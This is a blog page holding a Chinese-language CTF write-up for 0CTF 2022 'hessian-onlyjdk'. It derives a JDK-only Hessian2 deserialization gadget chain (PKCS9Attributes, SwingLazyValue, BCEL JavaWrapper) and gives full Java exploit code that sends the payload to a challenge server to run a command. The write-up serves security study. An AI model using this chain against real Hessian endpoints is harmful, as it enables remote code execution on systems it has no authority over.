<!DOCTYPE html>
<head>
    

<meta charset="utf-8">
<meta name="copyright" content="BASE">
<title>Siebene@ Blog</title>

<link rel='icon' type='image/png' href='/images/logo.png' />
<link rel='apple-touch-icon' sizes='180x180' href='/images/logo.png' />
<link rel='apple-touch-icon-precomposed' href='/images/logo.png' />


<link rel='canonical' href='/' />



<meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0">


<meta http-equiv="X-UA-Compatible" content="IE=8 ; IE=9">
<meta name="description" content="New &amp; Used Clothing / Design Office" />
<meta name="keywords" content="Siebene@ Blog,Siebene@,siebene@" />
<meta property="fb:app_id" content="350947278320210" />
<meta property="og:description" content="Siebene@ Blog" />
<meta property="og:title" content="Siebene@ Blog " />
<meta property="og:image" content="/images/f13bd126bc74fa5060f7ba8e569f76c0.gif" />
<meta property="og:url" content="/" />
<meta property="og:site_name" content="Siebene@ Blog " />
<meta property="og:type" content="website" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@Siebene7" />
<meta name="twitter:url" content="/" />
<meta name="twitter:title" content="Siebene@ Blog " />
<meta name="twitter:description" content="Siebene@ Blog" />
<meta name="twitter:image" content="/images/f13bd126bc74fa5060f7ba8e569f76c0.gif" />


<link rel="stylesheet" type="text/css" href="/css/search.css">

<link href='https://fonts.googleapis.com/css?family=Lato' rel='stylesheet' type='text/css'>

<link rel="stylesheet" type="text/css" href="/css/base.css">
<link rel="stylesheet" type="text/css" href="/css/windows.css">
<link rel="stylesheet" type="text/css" href="/css/BASEshop-24515246fb087d964f79.css"/>
<link rel="stylesheet" type="text/css" href="/css/github-markdown.css">

<style type="text/css">
body { 
        background-image: url("/images/bg.avif");     
        background-size: cover;
        background-attachment: fixed;
        background-repeat: no-repeat;
    }
</style>

<!-- metaCSS -->
<style type="text/css">
    .fontsize24 {
        font-size: 24px;
    }
    .fontsize28 {
        font-size: 28px;
    }
    .fontsize32 {
        font-size: 32px;
    }
    .fontsize36 {
        font-size: 36px;
    }
    .fontsize40 {
        font-size: 40px;
    }
    #logo.mincho, #windowHeader h1.mincho {
        font-family: "Hiragino Mincho ProN","Hiragino Mincho Pro",HGS明朝E,メイリオ,Meiryo,serif!important;
    }
    #logo.gothic, #windowHeader h1.gothic {
        font-family: 'Hiragino Kaku Gothic ProN','ヒラギノ角ゴ ProN W3',Meiryo,メイリオ,Osaka,'MS PGothic',arial,helvetica,sans-serif!important;
    }

    .appsItemCategoryTag_lowerLink {
        color: #1E2A86;
    }
        
    .logo_window h1 { font-family: 'Lato'; }
    .sp_logo h1 { font-family: 'Lato'; }
    
    /* ウィンドウヘッダーカラー */
    .window_header{
        background: navy;
    }
    .item_box section a {
        border-top: 24px solid navy;
    }
    @media screen and (max-width: 896px) {
        .item_box section a {
            border-top: none;
        }
    }
    .item_window_header{
    background: navy;
    }
</style>

<link rel="stylesheet" type="text/css" href="/css/label.css">

<meta name="cot:primaryColor" content="#000000">
<meta name="cot:accentColor" content="#000000">
<meta name="cot:textColor" content="#000000">
<meta name="cot:lightTextColor" content="#ffffff">
<meta name="cot:complementaryColor" content="#1E2A86">
<meta name="cot:titleColor" content="#000000">


<script src='/js/jquery.min.js'></script>
<meta name="generator" content="Hexo 7.3.0"></head>
<body>
    <div class="page">
    <div id="rightbar">
        <div class="sp sp_logo">
            <h1 class="fontsize32"><a href="/" id="logo" class="nothing"><img class="logoImage"
                        src="/images/f13bd126bc74fa5060f7ba8e569f76c0.gif"
                        alt="Siebene@ Blog"></a></h1>
            <p class="tagline">おかえりなさい</p>
        </div>
        <!-- メニュー -->
        <div id="nav-drawer">
            <input id="nav-input" type="checkbox" class="nav-unshown">
                <label class="nav-unshown" id="nav-close" for="nav-input"></label>
                <label id="nav-open" for="nav-input">
                    <span></span>
                </label>

            <div id="sideContainer">
                <div class="pc logo_window">
                    <div class="window_header">
                        <span>Siebene@ Blog</span>
                        <div class="window_close">
                            <span></span>
                        </div>
                    </div>
                    <h1 class="fontsize32">
                        <a href="/" id="logo" class="nothing"><img class="logoImage" src="/images/f13bd126bc74fa5060f7ba8e569f76c0.gif" alt="Siebene@ Blog">
                        </a>
                    </h1>
                    <p class="tagline">おかえりなさい</p>
                </div>

                <header id="windowHeader" class="hidden">
                    <div class="window_header">
                        <span>Menu</span>
                        <label for="nav-input">
                            <div class="window_close">
                                <span></span>
                            </div>
                        </label>
                    </div>

                    <div class="menu_window_container">
                        <div id="leftbar">
                            <div id="leftContent">
                                <nav id="global">
                                    <ul>
                                        <li id="home"><a class="mainHeaderNavColor" href="/">HOME</a></li>
                                        <li><a class="mainHeaderNavColor" href="/about">ABOUT</a></li>
                                        <li></li>
                                        <li class="languageSelect">
                                            <div id="i18" class="clearfix">
                                            </div>
                                        </li>
                                        <li class="sp"><a class="windowFooterNav" href="/">Privacy Policy</a></li>
                                        <li class="sp"><a class="windowFooterNav" href="/">Act on Specified Commercial Transactions</a></li>
                                    </ul>
                                </nav>
                            </div>
                        </div>
                    </div>
                </header>
            </div>
        </div>
        
        <div id="item_page_wrap">
            <section class="radius_box">
                <div id="second_column">
                    <div class="window_header">
                        <span>Spec</span>
                        <div class="window_close"><span></span></div>
                    </div>
                    <div class="item_page_window_container">
                        <div id="item_detail">
                            <p>0CTF2022-hessian-onlyjdk-WriteUp</p>
                            <br>
                            <p>2022-09-19</p>
                            <section class="markdown-body">
                                <p>依赖只存在jdk8u324和hessian2，目标是代码执行就行</p>
<p>根据题目的hint:</p>
<p><a target="_blank" rel="noopener" href="https://y4er.com/posts/wangdingbei-badbean-hessian2/">https://y4er.com/posts/wangdingbei-badbean-hessian2/</a></p>
<p><a target="_blank" rel="noopener" href="https://x-stream.github.io/CVE-2021-21346.html">https://x-stream.github.io/CVE-2021-21346.html</a></p>
<p>第一个提示从<code>toString</code>出发即可，第二个意思是利用JDK中的<code>SwingLazyValue</code>这条链</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">javax.swing.MultiUIDefaults.toString</span><br><span class="line">            UIDefaults.get</span><br><span class="line">                UIDefaults.getFromHashTable</span><br><span class="line">                    UIDefaults$LazyValue.createValue</span><br><span class="line">                    SwingLazyValue.createValue</span><br><span class="line">                        javax.naming.InitialContext.doLookup()</span><br></pre></td></tr></table></figure>

<p><code>sun.swing.SwingLazyValue#createValue</code>可以调用任意静态方法或者一个构造函数</p>
<p>不过这篇文章也指出<a target="_blank" rel="noopener" href="https://paper.seebug.org/1814/">https://paper.seebug.org/1814/</a></p>
<blockquote>
<p>经过测试，发现没法使用：</p>
<ul>
<li>javax.swing.MultiUIDefaults是peotect类，只能在javax.swing.中使用，而且Hessian2拿到了构造器，但是没有setAccessable，newInstance就没有权限</li>
<li>所以要找链的话需要类是public的，构造器也是public的，构造器的参数个数不要紧，hessian2会自动挨个测试构造器直到成功</li>
</ul>
<p>然后对于存在Map类型的利用链，例如ysoserial中的cc5部分：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">TiedMapEntry.toString()</span><br><span class="line">    LazyMap.get()</span><br><span class="line">        ChainedTransformer.transform()</span><br><span class="line">            ConstantTransformer.transform()</span><br><span class="line">            InvokerTransformer.transform()</span><br><span class="line">                Method.invoke()</span><br><span class="line">                    Class.getMethod()</span><br><span class="line">            InvokerTransformer.transform()</span><br><span class="line">                Method.invoke()</span><br><span class="line">                    Runtime.getRuntime()</span><br><span class="line">            InvokerTransformer.transform()</span><br><span class="line">                Method.invoke()</span><br><span class="line">                    Runtime.exec()</span><br></pre></td></tr></table></figure>

<p>这个也是无法利用的，因为Hessian2在恢复map类型的对象时，硬编码成了HashMap或者TreeMap，这里LazeMap就断了。</p>
<p>扫了下basic项目自带的包，没找到能用的链，三方包中找到利用链的可能性比较大一些。</p>
</blockquote>
<p>所以这条链就只能使用这部分</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">UIDefaults.get</span><br><span class="line">    UIDefaults.getFromHashTable</span><br><span class="line">        UIDefaults$LazyValue.createValue</span><br><span class="line">        SwingLazyValue.createValue</span><br></pre></td></tr></table></figure>

<p>需要自行构造前一部分，从<code>toString</code>到<code>HashTable.get()</code>（<code>UIDefaults extends Hashtable</code>）,同时也注意到是使用的<code>hessian2</code>反序列化，所以呢可以不用所有需要序列化的类型都实现<code>java.io.Serializable</code></p>
<p>配合一些审计工具（比如codeql或者bytedl）很容易就能发现从 <code>toString() -&gt; HashTable.get()</code>的路径</p>
<p>我这里找的是<code>sun.security.pkcs.PKCS9Attributes</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> String <span class="title function_">toString</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="type">StringBuffer</span> <span class="variable">var1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">StringBuffer</span>(<span class="number">200</span>);</span><br><span class="line">    var1.append(<span class="string">&quot;PKCS9 Attributes: [\n\t&quot;</span>);</span><br><span class="line">    <span class="type">boolean</span> <span class="variable">var4</span> <span class="operator">=</span> <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> <span class="variable">var5</span> <span class="operator">=</span> <span class="number">1</span>; var5 &lt; PKCS9Attribute.PKCS9_OIDS.length; ++var5) &#123;</span><br><span class="line">        <span class="type">PKCS9Attribute</span> <span class="variable">var3</span> <span class="operator">=</span> <span class="built_in">this</span>.getAttribute(PKCS9Attribute.PKCS9_OIDS[var5]);</span><br><span class="line">        <span class="keyword">if</span> (var3 != <span class="literal">null</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span> (var4) &#123;</span><br><span class="line">                var4 = <span class="literal">false</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                var1.append(<span class="string">&quot;;\n\t&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            var1.append(var3.toString());</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    var1.append(<span class="string">&quot;\n\t] (end PKCS9 Attributes)&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> var1.toString();</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>调用<code>getAttribute</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> PKCS9Attribute <span class="title function_">getAttribute</span><span class="params">(ObjectIdentifier var1)</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> (PKCS9Attribute)<span class="built_in">this</span>.attributes.get(var1);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这个<code>this.attributes</code>刚好是个<code>HashTable</code>，所以就很简单了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">byteArrayOutputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line"></span><br><span class="line">        <span class="type">Hessian2Output</span> <span class="variable">out</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hessian2Output</span>(byteArrayOutputStream);</span><br><span class="line">        out.getSerializerFactory().setAllowNonSerializable(<span class="literal">true</span>);<span class="comment">//这样就不用都要求实现java.io.Serializable</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="type">PKCS9Attributes</span> <span class="variable">s</span> <span class="operator">=</span> createWithoutConstructor(PKCS9Attributes.class);</span><br><span class="line">        <span class="type">UIDefaults</span> <span class="variable">uiDefaults</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">UIDefaults</span>();</span><br><span class="line"></span><br><span class="line">        uiDefaults.put(PKCS9Attribute.EMAIL_ADDRESS_OID, <span class="keyword">new</span> <span class="title class_">SwingLazyValue</span>(classname,methodname, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;&#125;));</span><br><span class="line"><span class="comment">//可以调用任意classname中的静态公共方法methodname，第三个参数是传递的参数</span></span><br><span class="line">        Reflections.setFieldValue(s,<span class="string">&quot;attributes&quot;</span>,uiDefaults);</span><br><span class="line"></span><br><span class="line">        out.writeString(<span class="string">&quot;aaa&quot;</span>);<span class="comment">//这里我使用的是修改后的Hessian2Output.java，完全是照这篇文章https://y4er.com/posts/wangdingbei-badbean-hessian2/ 修改的Hessian2Output.java</span></span><br><span class="line">        out.writeObject(s);</span><br><span class="line">        out.flushBuffer();</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="type">Hessian2Input</span> <span class="variable">hessian2Input</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hessian2Input</span>(<span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>((byteArrayOutputStream.toByteArray())));</span><br><span class="line">            hessian2Input.readObject();</span><br><span class="line"></span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception var5) &#123;</span><br><span class="line">            var5.printStackTrace();</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>然后题目中还给出了一个<code>javaagent</code>，只不过呢是二进制写的，后来我试了下，是将这个<code>com.sun.org.apache.xml.internal.security.utils.JavaUtils</code>类给ban掉了，这个类中的静态公共方法可以写文件，并且满足上面<code>SwingLazyValue</code>调用条件</p>
<p>所以呢需要重新在提供的jdk中寻找一个合适的，我最后是找到这个地方，我寻找的方法比较低效就不细说，不过呢我当时有个大体的思路，因为是只能调用静态公共方法，这种方法写出来一般是拿来用的，就是说至少会完成某个功能。而且由于是静态方法，跟调用类中的其他实例成员就感觉没啥关系，唯一还可以控制的地方就只有调用时传入的参数了，这样看下来感觉就不用去更精巧的构造某些东西，同时我当时也是知道这个<code>jdk</code>有bcel类加载器，所以说我感觉很大概率就会有可控的地方走到<code>Runtime.exec()</code>或者<code>Class.forName()</code>，不过能利用<code>Runtime.exec()</code>的地方同时还要符合条件我当时没找到，考虑<code>Class.forName</code>也是因为存在bcel加载器，同时也知道bcel加载器实际最后起作用的是<code>loadClass</code>，所以也要把<code>loadClass</code>考虑进sink点，最后呢配合工具，然后重点关注跟bcel加载器同一个包的类，因为感觉同包的类使用bcel加载器的概率更大，最后如愿以偿找到这个</p>
<p><code>com.sun.org.apache.bcel.internal.util.JavaWrapper</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">_main</span><span class="params">(String[] argv)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="keyword">if</span> (argv.length == <span class="number">0</span>) &#123;</span><br><span class="line">            System.out.println(<span class="string">&quot;Missing class name.&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="type">String</span> <span class="variable">class_name</span> <span class="operator">=</span> argv[<span class="number">0</span>];</span><br><span class="line">            String[] new_argv = <span class="keyword">new</span> <span class="title class_">String</span>[argv.length - <span class="number">1</span>];</span><br><span class="line">            System.arraycopy(argv, <span class="number">1</span>, new_argv, <span class="number">0</span>, new_argv.length);</span><br><span class="line">            <span class="type">JavaWrapper</span> <span class="variable">wrapper</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">JavaWrapper</span>();</span><br><span class="line">            wrapper.runMain(class_name, new_argv);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>进入<code>wrapper.runMain</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">runMain</span><span class="params">(String class_name, String[] argv)</span> <span class="keyword">throws</span> ClassNotFoundException &#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">cl</span> <span class="operator">=</span> <span class="built_in">this</span>.loader.loadClass(class_name);</span><br><span class="line">        <span class="type">Method</span> <span class="variable">method</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            method = cl.getMethod(<span class="string">&quot;_main&quot;</span>, argv.getClass());</span><br><span class="line">            <span class="type">int</span> <span class="variable">m</span> <span class="operator">=</span> method.getModifiers();</span><br><span class="line">            <span class="type">Class</span> <span class="variable">r</span> <span class="operator">=</span> method.getReturnType();</span><br><span class="line">            <span class="keyword">if</span> (!Modifier.isPublic(m) || !Modifier.isStatic(m) || Modifier.isAbstract(m) || r != Void.TYPE) &#123;</span><br><span class="line">                <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">NoSuchMethodException</span>();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">catch</span> (NoSuchMethodException var8) &#123;</span><br><span class="line">            System.out.println(<span class="string">&quot;In class &quot;</span> + class_name + <span class="string">&quot;: public static void _main(String[] argv) is not defined&quot;</span>);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            method.invoke((Object)<span class="literal">null</span>, argv);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception var7) &#123;</span><br><span class="line">            var7.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>



<p>这里的<code> this.loader</code>回过头去看看</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> ClassLoader <span class="title function_">getClassLoader</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="type">String</span> <span class="variable">s</span> <span class="operator">=</span> SecuritySupport.getSystemProperty(<span class="string">&quot;bcel.classloader&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (s == <span class="literal">null</span> || <span class="string">&quot;&quot;</span>.equals(s)) &#123;</span><br><span class="line">        s = <span class="string">&quot;com.sun.org.apache.bcel.internal.util.ClassLoader&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> (ClassLoader)Class.forName(s).newInstance();</span><br><span class="line">    &#125; <span class="keyword">catch</span> (Exception var2) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>(var2.toString());</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="title function_">JavaWrapper</span><span class="params">(ClassLoader loader)</span> &#123;</span><br><span class="line">    <span class="built_in">this</span>.loader = loader;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="title function_">JavaWrapper</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="built_in">this</span>(getClassLoader());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在<code>_main</code>里默认实例化一个<code>JavaWrapper</code>会调用到<code>getClassLoader</code>，刚好会将<code>this.loader</code>初始化为bcel加载器，接下来就很简单了</p>
<p>最后的paylaod</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">evil</span> &#123;</span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">_main</span><span class="params">(String[] argv)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">  Runtime.getRuntime().exec(<span class="string">&quot;touch /tmp/sie&quot;</span>);</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> Utils.Reflections;</span><br><span class="line"><span class="keyword">import</span> com.caucho.hessian.io.Hessian2Output;</span><br><span class="line"><span class="keyword">import</span> org.springframework.http.HttpEntity;</span><br><span class="line"><span class="keyword">import</span> org.springframework.http.ResponseEntity;</span><br><span class="line"><span class="keyword">import</span> org.springframework.web.client.RestTemplate;</span><br><span class="line"><span class="keyword">import</span> sun.security.pkcs.PKCS9Attribute;</span><br><span class="line"><span class="keyword">import</span> sun.security.pkcs.PKCS9Attributes;</span><br><span class="line"><span class="keyword">import</span> sun.swing.SwingLazyValue;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.swing.*;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.OutputStream;</span><br><span class="line"><span class="keyword">import</span> java.net.Socket;</span><br><span class="line"><span class="keyword">import</span> java.net.URI;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> <span class="keyword">static</span> Utils.Reflections.createWithoutConstructor;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">test</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">doPOST</span><span class="params">(<span class="type">byte</span>[] obj)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">URI</span> <span class="variable">url</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">URI</span>(<span class="string">&quot;http://47.90.137.5:8090/&quot;</span>);</span><br><span class="line">        HttpEntity&lt;<span class="type">byte</span>[]&gt; requestEntity = <span class="keyword">new</span> <span class="title class_">HttpEntity</span>&lt;&gt;(obj);</span><br><span class="line">        <span class="type">RestTemplate</span> <span class="variable">restTemplate</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">RestTemplate</span>();</span><br><span class="line">        ResponseEntity&lt;String&gt; res = restTemplate.postForEntity(url, requestEntity, String.class);</span><br><span class="line">        System.out.println(res.getBody());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line"></span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">byteArrayOutputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line"></span><br><span class="line">        <span class="type">Hessian2Output</span> <span class="variable">out</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Hessian2Output</span>(byteArrayOutputStream);</span><br><span class="line">        out.getSerializerFactory().setAllowNonSerializable(<span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="type">PKCS9Attributes</span> <span class="variable">s</span> <span class="operator">=</span> createWithoutConstructor(PKCS9Attributes.class);</span><br><span class="line">        <span class="type">UIDefaults</span> <span class="variable">uiDefaults</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">UIDefaults</span>();</span><br><span class="line"></span><br><span class="line">        uiDefaults.put(PKCS9Attribute.EMAIL_ADDRESS_OID, <span class="keyword">new</span> <span class="title class_">SwingLazyValue</span>(<span class="string">&quot;com.sun.org.apache.bcel.internal.util.JavaWrapper&quot;</span>, <span class="string">&quot;_main&quot;</span>, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="keyword">new</span> <span class="title class_">String</span>[]&#123;<span class="string">&quot;$$BCEL$$$xxxxx&quot;</span>,<span class="string">&quot;s&quot;</span>&#125;&#125;));</span><br><span class="line"></span><br><span class="line">        Reflections.setFieldValue(s,<span class="string">&quot;attributes&quot;</span>,uiDefaults);</span><br><span class="line"></span><br><span class="line">        out.writeString(<span class="string">&quot;aaa&quot;</span>);<span class="comment">//触发toString</span></span><br><span class="line">        out.writeObject(s);</span><br><span class="line">        out.flushBuffer();</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            doPOST(byteArrayOutputStream.toByteArray());</span><br><span class="line"></span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception var5) &#123;</span><br><span class="line">            var5.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>


                            </section>
                        </div>
                        <input type="hidden" name="AdditionalItemDetailDefaultCssAndJs" value="true">
                    </div>
                </div>
            </section>
        <!-- ショップレビュー -->
        </div>
        <br class="clear">
    </div>
</div>
</body>
    <footer id="windowFooter">
    <nav id="info">
        <ul class="clearfix">
            <li><a class="windowFooterNav" href="/">HOME</a></li>
            <li class="pc"><a class="windowFooterNav" href="/">Privacy Policy</a></li>
            <li class="pc"><a class="windowFooterNav" href="/">Act on Specified Commercial Transactions</a></li>
            <li>
                <div class="socialBtnList clearfix boxRight">
                    <div class="fb sns">
                        <div class="fb-share-button" data-href="/" data-layout="button_count" data-size="small" data-mobile-iframe="true"><a class="fb-xfbml-parse-ignore" target="_blank" href="https://github.com/Siebene">Github</a></div>
                    </div>
                    <div class="tw sns">
                        <a target="_blank" rel="noopener" href="https://x.com/Siebene7" class="twitter-share-button" data-url="https://x.com/Siebene7" data-lang="ja" data-hashtags="" data-via="Siebene@" data-text="Siebene@ Blog">Twitter!</a>
                    </div>
                </div>
            </li>
        </ul>
